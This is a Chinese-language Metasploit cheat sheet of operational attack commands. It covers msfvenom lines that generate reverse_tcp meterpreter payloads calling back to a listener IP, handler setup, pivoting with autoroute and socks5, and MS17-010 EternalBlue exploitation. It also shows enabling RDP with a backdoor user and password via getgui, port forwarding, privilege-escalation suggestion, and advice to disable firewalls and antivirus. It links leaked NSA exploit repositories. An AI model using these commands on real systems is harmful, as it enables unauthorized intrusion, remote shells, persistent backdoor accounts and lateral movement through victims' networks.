MSF常用

msf 下载windows
https://windows.metasploit.com/metasploitframework-latest.msi

linux下载Msf
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
或者
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run
chmod 755 metasploit-latest-linux-installer.run
./metasploit-latest-linux-installer.run

生成msf马
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.6.128 LPORT=7777 -f elf > /tmp/pay.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.128 LPORT=7777 -f exe -o flash.exe

监听
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.6.128
set LPORT 7777
exploit

查看是不是虚拟机
run post/windows/gather/checkvm
run post/linux/gather/checkvm #是否虚拟机

上线后的操作
1、添加路由是为了让本地能过去对方
run get_local_subnets 查看路由
run autoroute -s 192.168.200.0/24 把想打的网段添加一个路由
以上弃用

使用以下添加
run post/multi/manage/autoroute
route add 192.168.204.0 255.255.255.0 1
image.png
run autoroute -s 192.168.122.0 -n 255.255.255.0

2、可以先迁移个进程
getpid # 获取当前进程的pidps # 查看当前活跃进程migrate #将Meterpreter会话移植到指定pid值进程中kill #杀死进程
image.png
3
image.png

3、扫端口
run auxiliary/scanner/portscan/syn RHOSTS=192.168.1.144 PORTS=3389
image.png

主机存活扫描
auxiliary/scanner/discovery/arp_sweep ARP扫描
auxiliary/scanner/discovery/udp_sweep UDP扫描
auxiliary/scanner/netbios/nbname NETBIOS扫描
auxiliary/scanner/snmp/snmp_enum SNMP扫描
auxiliary/scanner/smb/smb_version SMB扫描

检测开放3389
use auxiliary/scanner/rdp/rdp_scanner
set rhosts 10.0.15.10-33
run

检测开放smb
use scanner/smb/smb_version

ms17-010
添加路由放到后台
background(转换到后台)
sessions -i 1

检测
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.204.143
set THREADS 100
exploit

在利用ms17-010要注意使用永恒浪漫和永恒之蓝
永恒浪漫——xp和2003可以稳定使用(需要开启匿名管道,在高版本的系统不一定能成功,但是可以试试)
攻击

  1. use exploit/windows/smb/ms17_010_psexec 支持版本多(如win server2003
  2. use auxiliary/admin/smb/ms17_010_command 稳定
  3. use exploit/windows/smb/ms17_010_eternalblue 当这个利用失败的时候建议使用

set RHOSTS 10.110.3.208

  1. set payload windows/x64/meterpreter/reverse_tcp
  2. set payload windows/x64/meterpreter/bind_tcp ——建议使用这个
  3. 但是bind_tcp是无法进行交互式shell

//set LHOST x.x.x.x
//set LPORT xxxx
run

run getgui -e 开启远程
run getgui -u aaa -p admin@123

msf自带的代理代理进去socks5内网里
setg Proxies socks5:vps_IP:vps_PORT
setg reverseallowproxy true

开socks5
use auxiliary/server/socks5
set srvport 7777

端口转发
portfwd add -l 55555 -r 192.168.16.1 -p 3306

查看windows下有什么提权建议
use multi/recon/local_exploit_suggester

开启交互式shell
execute -H -i -f cmd.exe

MS17-010直接利用

1、k8gege.org ksmb工具
直接把它拖到内网使用(记得关windows自带的防火墙和一些杀软工具)

ladon_ms17010_exp.rar
使用效果如下所示,好用
image.png

https://mp.weixin.qq.com/s/ck46QIT1uixEhNqdv1t25Q
https://github.com/misterch0c/shadowbroker
https://github.com/x0rz/EQGRP_Lost_in_Translation